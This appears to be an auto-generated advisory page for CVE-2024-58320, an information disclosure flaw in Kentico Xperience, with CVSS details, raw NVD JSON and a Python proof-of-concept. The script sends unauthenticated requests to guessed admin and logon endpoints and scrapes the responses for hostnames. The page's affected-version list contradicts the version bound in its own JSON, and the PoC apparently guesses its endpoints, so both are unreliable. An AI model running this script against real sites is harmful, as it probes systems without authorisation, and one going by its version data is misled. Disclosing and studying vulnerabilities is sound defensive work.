Security Vulnerability Report
中文
CVE-2024-58320 CVSS 5.3 MEDIUM

CVE-2024-58320

Published: 2025-12-18 20:15:54
Last Modified: 2025-12-24 16:39:36

Description

An information disclosure vulnerability in Kentico Xperience allows public users to access sensitive administration interface hostname details during authentication. Attackers can retrieve confidential hostname configuration information through a public endpoint, potentially exposing internal network details.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:* - VULNERABLE
Kentico Xperience < 13.0.200
Kentico Xperience < 14.0.150
Kentico Xperience < 15.0.50

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2024-58320 PoC - Kentico Xperience Information Disclosure import requests import sys import json def exploit_cve_2024_58320(target_url): """ PoC for CVE-2024-58320: Kentico Xperience Authentication Information Disclosure This PoC demonstrates how an unauthenticated user can access sensitive administration interface hostname details through a public endpoint. """ # Target endpoints that may expose hostname configuration endpoints = [ "/CMSPages/logon.aspx", "/CMSPages/portal.aspx", "/CMSAPI/logon", "/kentico/admin" ] print(f"[*] Target: {target_url}") print(f"[*] CVE-2024-58320 Information Disclosure PoC\n") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Send request to public endpoint response = requests.get(url, timeout=10, allow_redirects=False) # Check for hostname information in response if response.status_code == 200: content = response.text # Look for hostname patterns hostname_patterns = [ r'hostname[=:]\s*[\"\']([^\"\']+)[\"\']', r'server[=:]\s*[\"\']([^\"\']+)[\"\']', r'domain[=:]\s*[\"\']([^\"\']+)[\"\']', r'admin.*url[=:]\s*[\"\']([^\"\']+)[\"\']' ] print(f"[+] Endpoint: {endpoint}") print(f" Status: {response.status_code}") print(f" Content-Length: {len(content)}") # Extract potential hostname info for pattern in hostname_patterns: import re matches = re.findall(pattern, content, re.IGNORECASE) if matches: print(f" [!] Potential hostname leaked: {matches}") print() except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {str(e)}") print("[*] Scan complete. Review output for leaked hostname information.") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2024-58320-poc.py <target_url>") print("Example: python cve-2024-58320-poc.py https://vulnerable-site.com") sys.exit(1) target = sys.argv[1] exploit_cve_2024_58320(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-58320", "sourceIdentifier": "[email protected]", "published": "2025-12-18T20:15:53.933", "lastModified": "2025-12-24T16:39:35.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An information disclosure vulnerability in Kentico Xperience allows public users to access sensitive administration interface hostname details during authentication. Attackers can retrieve confidential hostname configuration information through a public endpoint, potentially exposing internal network details."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:*", "versionEndIncluding": "13.0.159", "matchCriteriaId": "529B6DDC-9ADE-4BDB-896A-3D63BB332E85"}]}]}], "references": [{"url": "https://devnet.kentico.com/download/hotfixes", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/kentico-xperience-authentication-information-disclosure", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}